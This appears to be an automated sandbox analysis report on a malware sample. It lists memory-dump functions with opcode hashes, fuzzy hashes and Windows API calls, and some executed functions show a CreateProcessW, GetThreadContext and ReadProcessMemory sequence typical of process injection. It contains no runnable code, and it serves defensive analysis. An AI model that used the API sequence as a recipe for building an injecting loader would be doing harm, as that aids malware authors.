              • Instruction Fuzzy Hash: 76E02037304110574350D65DC410DAE77ABEBD5620300882FC51A9B711DF72EC02CFD0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 6997097da4d5eeaf086403561c1808c9952834e4d79a27c8f30bbe2b5aad8c40
              • Instruction ID: 88aebf93b187cb6b07cdd19f85d50fd865a717e85183c443091dc24fe531059f
              • Opcode Fuzzy Hash: 6997097da4d5eeaf086403561c1808c9952834e4d79a27c8f30bbe2b5aad8c40
              • Instruction Fuzzy Hash: 65E04F363146215B8764D66DC4109AE7B9FEBC5A203558C6ED60A9B760EF73EC028BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: cdaeaa13900a849382496c1ade37811c752312acdc2d8c200cb4b7878cbf632b
              • Instruction ID: 4e74b8e5c9eb1f5f175a46e373465d702d9358a88de3d37bcc4fd7429e328a40
              • Opcode Fuzzy Hash: cdaeaa13900a849382496c1ade37811c752312acdc2d8c200cb4b7878cbf632b
              • Instruction Fuzzy Hash: 7FE0DF3530021127D258D9ACC8419B9B7DEEBD2A61B04885FF549DB2A1DB72980287D0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 60b4cf20c25d56148cd891b28a200b02600f18eb458fe4f566db853fac8d60fe
              • Instruction ID: faa7dd7e869a9eafa6b5267a1ed9e965663f51b4cbbb4b32a8e8bd6988a59766
              • Opcode Fuzzy Hash: 60b4cf20c25d56148cd891b28a200b02600f18eb458fe4f566db853fac8d60fe
              • Instruction Fuzzy Hash: FDF08C71F041549FEBA09F59E8187D8B776FB80711F088099EA44970A2CBB449D1CF91
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bdb88634c5d1fe2bb769cfe91b5d18af4a2423e3ce98ed985426b25bd89e7c22
              • Instruction ID: 4c70c9ffbf26f29b3c668a4e7b75d07edca2b8500b83fe02ded3b1cc2f233580
              • Opcode Fuzzy Hash: bdb88634c5d1fe2bb769cfe91b5d18af4a2423e3ce98ed985426b25bd89e7c22
              • Instruction Fuzzy Hash: A1E0D8367443905FC79587B894604FD7BF9AFD2630305849FD446DF262D6768C028BA0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 889a747fb956afeaf6fd6bf050f6f260961ae01fd7b2251d0058035351c3af9a
              • Instruction ID: 070a157fbbf121c8a22d8a7a1a068ece54c850c6eca84d06381986305de76ec7
              • Opcode Fuzzy Hash: 889a747fb956afeaf6fd6bf050f6f260961ae01fd7b2251d0058035351c3af9a
              • Instruction Fuzzy Hash: 8AE0123BA08605DB86E4E6118510836F3BBAE42655380862BC9839AE10DB65FCC3DF83
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fbafd4308fe64841ad583102f3073f6c6ba8e42e8f85b7650bc4f548ec3f0a3
              • Instruction ID: ca20c95cf136e002f00f3b2e6cc0611ecf45e1e197940e37ccb902858af02496
              • Opcode Fuzzy Hash: 7fbafd4308fe64841ad583102f3073f6c6ba8e42e8f85b7650bc4f548ec3f0a3
              • Instruction Fuzzy Hash: D0E06D31500B108BC334DE5BD401942F7EAFBD0711B248E2F919983654DBB0A9058AA0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7e9016ee92cce41f4ad7d06013063d0361eca7af333972bebf2448cb3fa3606f
              • Instruction ID: a42f2f6b01b500fe561970150bfffbea576ad615f7ca9f3fdf0beb9dd8ad87c7
              • Opcode Fuzzy Hash: 7e9016ee92cce41f4ad7d06013063d0361eca7af333972bebf2448cb3fa3606f
              • Instruction Fuzzy Hash: E6E012323141259B9554A66E90118BE76CFAFD95A2314016FB10BD7250DE919D03D7F2
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 480c5ca9e4edb17e6ab1765b8b8f6f9b2ff4bbc761171f27010c1be59069338e
              • Instruction ID: ad94881523d8aab02225ffe6852493e9df2bc048e9ad08d9236ba9c1e6ba42b0
              • Opcode Fuzzy Hash: 480c5ca9e4edb17e6ab1765b8b8f6f9b2ff4bbc761171f27010c1be59069338e
              • Instruction Fuzzy Hash: E8F0AC3511420AFFCB58EF10D856969BF7ABB45341B00A015F8468A593CF30BE81CF96
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3d50d8a19496bf811051b4c592ccffff93ab8658f5e8735ed1e8220efa91a997
              • Instruction ID: 9a820eee49ee03bcdf9c1efee397324dc6beb20d43af31eb1d141dd61d86ba04
              • Opcode Fuzzy Hash: 3d50d8a19496bf811051b4c592ccffff93ab8658f5e8735ed1e8220efa91a997
              • Instruction Fuzzy Hash: D7E08C327AA2525FCB659AB414B00A937D60AA253030045AFD006CB252C96A0C438B81
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e874979cc7ba72b32f1aaf9c0ced44cb2522d4ac0ed7f2bd85e86467f053a83d
              • Instruction ID: e31228b389d31921c437af1902fb21fbfd2d4cf05f75d3c5d05ffb886c42d58f
              • Opcode Fuzzy Hash: e874979cc7ba72b32f1aaf9c0ced44cb2522d4ac0ed7f2bd85e86467f053a83d
              • Instruction Fuzzy Hash: ECE08C315483408FC7669BB0A4290987BB0EF4623432249BFC40ACB762EABE8891CB11
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fa3d3608b6ce93c9ab049b6059e12ef209d259ea86432bcc04d20087c18e0fd
              • Instruction ID: 2cd59e15df992b352bd8e4474db6faf3dbf2b41e650312439b0cb16e94bd79fb
              • Opcode Fuzzy Hash: 7fa3d3608b6ce93c9ab049b6059e12ef209d259ea86432bcc04d20087c18e0fd
              • Instruction Fuzzy Hash: B6E012361DD381DFD395579498397B0BBA1EB17332F140DA3D046C9066D2590C43CF11
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9b565176f1b430091e5e6955ba5c871b3b92834ed011657e5eeed952b070897c
              • Instruction ID: 1c21f2af4d193fc20c94d29afe01caf57b9494cdc35350de9cbfa5962d2892d7
              • Opcode Fuzzy Hash: 9b565176f1b430091e5e6955ba5c871b3b92834ed011657e5eeed952b070897c
              • Instruction Fuzzy Hash: 90D05B73B0C426CBDB50679DE8446693DCADB41651B4C006BDD0BD2252D9999C418B96
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: fe481eabfc976b37332a9f2e0e76c141b3135b317ad95d2c37eb53bd94ee0a4e
              • Instruction ID: 8bbc1c73f0b9e8e360d8e446c5bc896275b98df7b9b1fc4dd38991e55b831f57
              • Opcode Fuzzy Hash: fe481eabfc976b37332a9f2e0e76c141b3135b317ad95d2c37eb53bd94ee0a4e
              • Instruction Fuzzy Hash: B3D09721740229174A54B63B2804A3E324F7BD0852300442EE50AEA380EE25DC0343EA
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: df8c7db2e21cfc097e8a3a39351cca203bc767b6ad0eb518a986da201f78c23b
              • Instruction ID: c2a0093bce0e23245341b12a797e5f0ccb25752815cedeed9ecbbf8a967c08d3
              • Opcode Fuzzy Hash: df8c7db2e21cfc097e8a3a39351cca203bc767b6ad0eb518a986da201f78c23b
              • Instruction Fuzzy Hash: 89E0EC36548B408FC3B18694E859496BBF1BB81620315895FD48286658D724BC42CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8ef1d90b98823c648a922ea73821d33d79b50b5f676a681192096987705e83ad
              • Instruction ID: 92e5a5590dae84f2696de1f42a87cd33529ccd90532efe7872afc398d4d61ef4
              • Opcode Fuzzy Hash: 8ef1d90b98823c648a922ea73821d33d79b50b5f676a681192096987705e83ad
              • Instruction Fuzzy Hash: FCE08C6710C740CEC761CA209408972BBB7BB79211B10995AF58B86CD3DA31AC43CB95
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 83eeb970cd9bfaa802df8d47c956766ba4faf248a39f0f5502106e22b9be380d
              • Instruction ID: 18cbfba165295535960c2efbb6ebaa9c36423a5dc44b3e80db202fb854a5ea6c
              • Opcode Fuzzy Hash: 83eeb970cd9bfaa802df8d47c956766ba4faf248a39f0f5502106e22b9be380d
              • Instruction Fuzzy Hash: DED0A775344124279644E5ADD850CB9739FEBD5A24305885FA90EDF391DE73DC0243D0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e63507a46d0b4698c17a976a6fa2cf5983f2a1bf7853ad4f633581ed8527a206
              • Instruction ID: ab6fed87b5719843cfc95c3830e0355f28a812f7b3c2decf85f8dc792b5b29ab
              • Opcode Fuzzy Hash: e63507a46d0b4698c17a976a6fa2cf5983f2a1bf7853ad4f633581ed8527a206
              • Instruction Fuzzy Hash: 3BD0C23300C3548BC3358625A400776B7DAEB02714F06085ED9430594086A1EC85CB93
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: aef38787714efc9c8d80d85fb47778b60c401bc3fa1c9813e4a0a4071f0706d9
              • Instruction ID: 11714f0c72c924cfaa4e3667b5332b39b43c559afebf77c78fd9b53d09bbaf73
              • Opcode Fuzzy Hash: aef38787714efc9c8d80d85fb47778b60c401bc3fa1c9813e4a0a4071f0706d9
              • Instruction Fuzzy Hash: F9D0A7B3C86390CFC7A68A716C1E0E57B61DFE2329B15C4BBC40182521D6761E83CF52
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c22227232d068a19cb63db623d7536f4dfc4b3fd4703c2d1b6201f2bb00c09e8
              • Instruction ID: c4c8e30699b47998add62fd9dca716df525e8a0c254a4abd27fb49e0682a4802
              • Opcode Fuzzy Hash: c22227232d068a19cb63db623d7536f4dfc4b3fd4703c2d1b6201f2bb00c09e8
              • Instruction Fuzzy Hash: 92E01232004612DBC368DE14D951751B7EEEB86755B502D1EE4864B590EB77BEC2CF80
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 0000000C.00000002.912202786.00000000056A0000.00000040.00000001.sdmp, Offset: 056A0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: da8d54536b8b1b8eeef829f7aaf8a8b48117bbb14b9ba4711036b38e607183ba
              • Instruction ID: 5b5a2f868d0f086f2844811f53828337798283a2245be57e5be140b49d497e60
              • Opcode Fuzzy Hash: da8d54536b8b1b8eeef829f7aaf8a8b48117bbb14b9ba4711036b38e607183ba
              • Instruction Fuzzy Hash: 13D05E33108724DBC764D65490009B2F6BBBB69512B00842AF54B82D83CA71BC43CFD1
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Strings
              Memory Dump Source
              • Source File: 0000000C.00000002.914627846.0000000006CD0000.00000040.00000001.sdmp, Offset: 06CD0000, based on PE: false
              Similarity
              • API ID:
              • String ID: :@pq
              • API String ID: 0-3329585733
              • Opcode ID: c686933a477ba3ccb2502fe104fec5860e72b83f25a361302e79fe08d64b880c
              • Instruction ID: 9cc2b49da30ac8b7d6b59bac05306e5ec00202cff650e111176a643d8cbff8c5
              • Opcode Fuzzy Hash: c686933a477ba3ccb2502fe104fec5860e72b83f25a361302e79fe08d64b880c
              • Instruction Fuzzy Hash: E451C0B4D01208DFDB15DFA9D994AAEBBF2FF49300F20816AE905A7365D734AD01CB61
              Uniqueness

              Uniqueness Score: -1.00%

              Executed Functions

              APIs
                • Part of subcall function 02F1126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02F118E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02F11960
              Strings
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              • Opcode ID: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction ID: 0e0c1f0854972cb0b8b111aa65489d29d9002ae4c88cc3b85f6e7afb3584bd52
              • Opcode Fuzzy Hash: 9836bb2fa113f8532c703a36e22e53b5fb9b0defa331fff036c345c23b29506d
              • Instruction Fuzzy Hash: 47024B25E54398E9EB61CBE4EC16BEDB7B5AF04B10F50448AE60CFA1D1D3B10A84DF16
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02F10A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02F10C1F
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              • Opcode ID: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction ID: 04d0a6c51d010c2d90088deb031727e81730b81c60a4c3156ce8ff28ee7549dd
              • Opcode Fuzzy Hash: 2896953df3b337a7edc239ec9e3748cbe23ec4b89491ad47033057de49a05fab
              • Instruction Fuzzy Hash: B5A1F035E00249EFDF14CFE4C985BADBBB1EF08355F60849AEA10BA2A0D7755A81DF14
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 02F105BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 02F105E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02F10605
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadThread
              • String ID:
              • API String ID: 2411489757-0
              • Opcode ID: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction ID: 5b6f82afa4f19e7e8ed4e9742af0cb87ba6dc42dff5e3dd75d013b1d3426825a
              • Opcode Fuzzy Hash: 7ccdf02250a7f57193278edde130f34dbf23f9f58fec9f604b246064b05aa7b6
              • Instruction Fuzzy Hash: 6F525D35E50258EEEB60CBA4EC55BFDB7B5AF48710F50449AEA08EA2A0D7705EC0DF05
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 02F1128F
              Memory Dump Source
              • Source File: 0000000D.00000002.732899664.0000000002F10000.00000040.00000001.sdmp, Offset: 02F10000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              • Opcode ID: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction ID: 0ed5d90a96634ea9f89f7d1cf6f0a10d53323473acfa44cc33b6114d1b48ce1d
              • Opcode Fuzzy Hash: 995ef871e1a5def57f6e13ec2e7b1f3b75d42bd7157b0b3a82b0e07460e609ee
              • Instruction Fuzzy Hash: FBD05EB1C5034CBFDB08EFE1CC8685DBF7DDB05341F50819AAD0067100DA759B109B94
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.713244797.0000000000E52000.00000040.00000001.sdmp, Offset: 00E52000, based on PE: false
              Similarity
              • API ID:
              • String ID: 1'r<$Atqp$Ppq
              • API String ID: 0-1036205073
              • Opcode ID: 6a43edb41d14957b809b827357ae494026fe23dd3d41fa4983b53f345f830353
              • Instruction ID: e5b3bb47b8f91d2544f64101a6ca528ff9396c0847a547f51a4c0170a9b30468
              • Opcode Fuzzy Hash: 6a43edb41d14957b809b827357ae494026fe23dd3d41fa4983b53f345f830353
              • Instruction Fuzzy Hash: 98525A6281E3C14FC727473458651957F70AE63316B5E69CFCAC0EF1A3E219894EC3A6
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E5A5E9
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 42f7208b8aa98b87d8f5aa3e9ab12098b1b9add4b0a0cc401506d157dd2400ac
              • Instruction ID: c40632cf4003566b8317d2d86d879d1d191f2d3fa01792f05ba507fe5c1a2cf7
              • Opcode Fuzzy Hash: 42f7208b8aa98b87d8f5aa3e9ab12098b1b9add4b0a0cc401506d157dd2400ac
              • Instruction Fuzzy Hash: A83190B1505380AFE722CF25CC44F66BFE8EF05314F0885AAE9849B252D271E909CB71
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A6D5
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              • Opcode ID: 81b70b40cb3d48978eddd9527407a7e584083cf8e053a3004bc029795b88aa5e
              • Instruction ID: 26bf6fe4fd616913660b93f97b456259ba98eece62d8346e89eb976b93a54c2e
              • Opcode Fuzzy Hash: 81b70b40cb3d48978eddd9527407a7e584083cf8e053a3004bc029795b88aa5e
              • Instruction Fuzzy Hash: 2221F8B65087806FE7138B25DC44FA6BFB8EF46720F0885DBED849B153D224A909C7B1
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00E5A5E9
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: e9755babbee94327680c92173b211f9bccd705475fc97502cdc5d917b00d6953
              • Instruction ID: 1019f5f8348c23eea73297259d865e75030f7c3592533a0cc544107972f67d9a
              • Opcode Fuzzy Hash: e9755babbee94327680c92173b211f9bccd705475fc97502cdc5d917b00d6953
              • Instruction Fuzzy Hash: 05216071500700AFE721CF65CC44B56FBE8EF04310F18896AED859B651D775E409CA72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WriteFile.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A7A1
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              • Opcode ID: 7b64b9efbd64b335ed5e165efab2500afc75178dfe62ca0f2ee90ba9cfb27006
              • Instruction ID: 472c08f9d0cc1bb92da6e8e4dc76a2479c64bb6114d6aaa3a50a9053fd6ccbdd
              • Opcode Fuzzy Hash: 7b64b9efbd64b335ed5e165efab2500afc75178dfe62ca0f2ee90ba9cfb27006
              • Instruction Fuzzy Hash: 022192B1509380AFE7228F25DC44F56BFB8EF46314F0885ABE9849F153C225A809CB72
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 00E5ACB2
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: LanguageName
              • String ID:
              • API String ID: 2060303382-0
              • Opcode ID: 41f53398114e36a5bb64a92834b4fe2783706d28d626f5450d62ef523874c103
              • Instruction ID: f76718631cfe3000169d126521022b0acf8067dde67bfa5fd4921018e2234952
              • Opcode Fuzzy Hash: 41f53398114e36a5bb64a92834b4fe2783706d28d626f5450d62ef523874c103
              • Instruction Fuzzy Hash: FD2192755097816FD3138B25DC51B62BFB8EF87B20F0981DBE8848B553D224A91AC7B2
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00E5A863
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoSizeVersion
              • String ID:
              • API String ID: 1661704012-0
              • Opcode ID: 8ea16b13d923b683942d70de7e873fe0116257849101e4a3cd02a49ffcdc11e0
              • Instruction ID: cf91b0f864d6cff3b612fc3adffe5b2546195c0a9b63e599884916109cec6f34
              • Opcode Fuzzy Hash: 8ea16b13d923b683942d70de7e873fe0116257849101e4a3cd02a49ffcdc11e0
              • Instruction Fuzzy Hash: E421AE714093C45FEB12CB29DC85B92BFE4EF06314F0D85EADC849F153D2649809CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 00E5A39C
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              • Opcode ID: 919ca33ec7b91fc89eb393fe32d138bbe2e1066f9b43a9cdab19c1b99cec7fdc
              • Instruction ID: c82fbd48f7794b834d872ff97809ab2103cd34894ae80f1124c1fb3ed399dbcd
              • Opcode Fuzzy Hash: 919ca33ec7b91fc89eb393fe32d138bbe2e1066f9b43a9cdab19c1b99cec7fdc
              • Instruction Fuzzy Hash: AA216D715093C09FD7128B25DC85A56BFB4EF06224F0984EBED85CF163C278A848CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetConsoleOutputCP.KERNELBASE ref: 00E5A269
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ConsoleOutput
              • String ID:
              • API String ID: 3985236979-0
              • Opcode ID: a011b2a651a3929691d74b4394e9ce9354688208455f53eaa005d072e7e2669b
              • Instruction ID: 50762f45a21d4ea39e1089610eb373bcf28ac50ca668e5366e11e0bcb94129b1
              • Opcode Fuzzy Hash: a011b2a651a3929691d74b4394e9ce9354688208455f53eaa005d072e7e2669b
              • Instruction Fuzzy Hash: 74219A7540E7C05FD7138B65CC95682BFB4EF07224F0E80EBD8848F1A3C268A908CB62
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • WriteFile.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A7A1
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileWrite
              • String ID:
              • API String ID: 3934441357-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 00E5A919
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoVersion
              • String ID:
              • API String ID: 2427832333-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetErrorMode.KERNELBASE(?), ref: 00E5A448
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileType.KERNELBASE(?,00000E2C,B7E2F1D1,00000000,00000000,00000000,00000000), ref: 00E5A6D5
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileType
              • String ID:
              • API String ID: 3081899298-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 00E5A919
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoVersion
              • String ID:
              • API String ID: 2427832333-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 00E5A863
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: FileInfoSizeVersion
              • String ID:
              • API String ID: 1661704012-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 00E5ACB2
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: LanguageName
              • String ID:
              • API String ID: 2060303382-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • FindCloseChangeNotification.KERNELBASE(?), ref: 00E5A39C
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ChangeCloseFindNotification
              • String ID:
              • API String ID: 2591292051-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetErrorMode.KERNELBASE(?), ref: 00E5A448
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ErrorMode
              • String ID:
              • API String ID: 2340568224-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetConsoleOutputCP.KERNELBASE ref: 00E5A269
              Memory Dump Source
              • Source File: 00000011.00000002.713270096.0000000000E5A000.00000040.00000001.sdmp, Offset: 00E5A000, based on PE: false
              Similarity
              • API ID: ConsoleOutput
              • String ID:
              • API String ID: 3985236979-0
              Uniqueness

              Uniqueness Score: -1.00%

              Strings
              Memory Dump Source
              • Source File: 00000011.00000002.715034795.0000000005040000.00000040.00000001.sdmp, Offset: 05040000, based on PE: false
              Similarity
